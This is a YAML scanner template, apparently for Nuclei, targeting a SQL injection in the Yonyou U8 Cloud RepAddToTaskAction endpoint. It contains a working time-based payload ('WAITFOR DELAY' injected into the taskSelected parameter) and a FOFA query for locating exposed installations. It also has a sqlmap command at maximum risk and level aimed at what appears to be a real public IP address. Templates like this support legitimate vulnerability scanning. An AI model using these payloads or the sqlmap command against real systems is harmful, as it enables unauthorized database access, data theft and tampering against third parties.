id: yonyou-u8-cloud-RepAddToTaskAction-sqli
info:
  name: 用友 U8 Cloud RepAddToTaskAction - sqli
  author: leadlife
  severity: high
  description: 用友 U8-Cloud 系统接口RepAddToTaskAction存在SQL注入漏洞，允许攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。
  reference: 
    - https://github.com/wy876/POC/blob/main/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8BU8-Cloud%E7%B3%BB%E7%BB%9F%E6%8E%A5%E5%8F%A3RepAddToTaskAction%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  classification:
    cve-id: 
  metadata:
    verified: true
    fofa-query: app="用友-U8-Cloud" || title=="U8C"
    sqlmap: sqlmap -u "http://101.200.58.167:8088/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iuforeport.rep.RepAddToTaskAction&method=save&taskSelected=1" -p taskSelected  --batch --risk 3 --level 5 --tamper=space2comment --dbms=mssql
  tags: 2024,sqli,time,yonyou,u8cloud,oa

http:
  - raw:  
      - |
        @timeout: 15s
        GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iuforeport.rep.RepAddToTaskAction&method=save&taskSelected=1%27);WAITFOR+DELAY+%270:0:6%27-- HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Connection: close
        
    matchers:
      - type: dsl
        name: mssql
        dsl:
          - contains_all(body,'iufo')
          - status_code == 200
          - duration >= 5 && duration < 9
        condition: and